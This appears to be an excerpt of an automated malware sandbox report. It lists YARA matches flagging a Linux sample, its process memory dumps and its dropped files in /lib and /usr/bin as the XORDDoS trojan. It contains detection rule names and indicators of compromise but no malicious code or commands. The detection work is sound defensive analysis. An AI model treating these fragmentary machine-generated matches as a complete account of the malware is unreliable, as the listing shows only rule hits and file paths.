            Source: Yara matchFile source: 9860.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10434.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10368.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10401.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10027.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10225.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9451, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9454, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9457, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9462, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9552, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9563, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9574, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9585, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9596, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9607, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9618, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9629, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9640, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9651, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9662, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9673, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9695, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9706, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9717, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9728, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9739, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9750, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9761, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9772, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9783, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9794, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9805, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9816, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9827, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9838, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9849, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9860, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9871, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9882, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9893, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9904, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9915, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9926, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9937, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9948, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9959, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9970, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9981, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9994, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 10005, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 10016, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 10027, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 10038, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 10049, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 10060, type: MEMORYSTR
            Source: Yara matchFile source: /lib/libudev.so, type: DROPPED
            Source: Yara matchFile source: /usr/bin/wzhmvohlxs, type: DROPPED
            Source: Yara matchFile source: /usr/bin/hiueshutol, type: DROPPED
            Source: Yara matchFile source: /usr/bin/mhvrcmaysv, type: DROPPED
            Source: Yara matchFile source: /usr/bin/lnmgbribvb, type: DROPPED
            Source: Yara matchFile source: /usr/bin/hgfzmygnbx, type: DROPPED
            Source: Yara matchFile source: /usr/bin/wdcujvrbpo, type: DROPPED
            Source: Yara matchFile source: /usr/bin/dezqblvxuy, type: DROPPED
            Source: Yara matchFile source: /usr/bin/chdmwyeiia, type: DROPPED
            Source: Yara matchFile source: /usr/bin/ckxgqrmzxa, type: DROPPED
            Source: Yara matchFile source: /usr/bin/lsodknzpps, type: DROPPED
            Source: Yara matchFile source: /usr/bin/eoqlmyvucn, type: DROPPED
            Source: Yara matchFile source: /usr/bin/cjfywultqo, type: DROPPED
            Source: Yara matchFile source: /usr/bin/zbksjhrfms, type: DROPPED

            System Summary

            barindex
            Source: iJl2Sb6qRa, type: SAMPLEMatched rule: Detects XORDDoS Author: ditekSHen
            Source: iJl2Sb6qRa, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: iJl2Sb6qRa, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10071.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10071.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10071.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10181.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10181.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10181.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10423.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10423.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10423.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9904.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9904.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9904.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10445.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10445.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10445.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10159.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10159.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10159.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9684.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9684.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9684.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10412.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10412.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10412.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9761.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9761.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9761.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9838.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9838.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9838.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9607.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9607.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9607.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9772.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9772.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9772.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10148.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10148.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10148.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10280.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10280.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10280.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10291.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10291.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10291.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9948.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9948.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9948.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9662.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9662.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9662.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10346.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10346.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10346.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9739.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9739.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9739.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10093.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10093.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10093.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10104.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10104.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10104.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9462.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9462.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9462.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10005.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10005.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10005.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9454.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9454.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9454.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10016.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10016.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10016.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9651.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9651.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9651.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9629.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9629.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9629.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9959.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9959.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9959.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10269.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10269.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10269.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10258.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10258.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10258.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9816.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9816.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9816.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10324.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10324.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10324.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9563.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9563.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9563.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9926.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9926.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9926.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9871.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9871.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9871.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10247.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10247.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10247.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10115.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10115.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10115.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10214.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10214.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10214.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10192.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10192.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10192.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9794.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9794.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9794.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9695.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9695.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9695.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10390.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10390.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10390.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9706.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9706.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9706.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10137.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10137.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10137.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9640.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9640.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9640.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10379.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10379.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10379.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9915.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9915.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9915.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9728.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9728.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9728.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
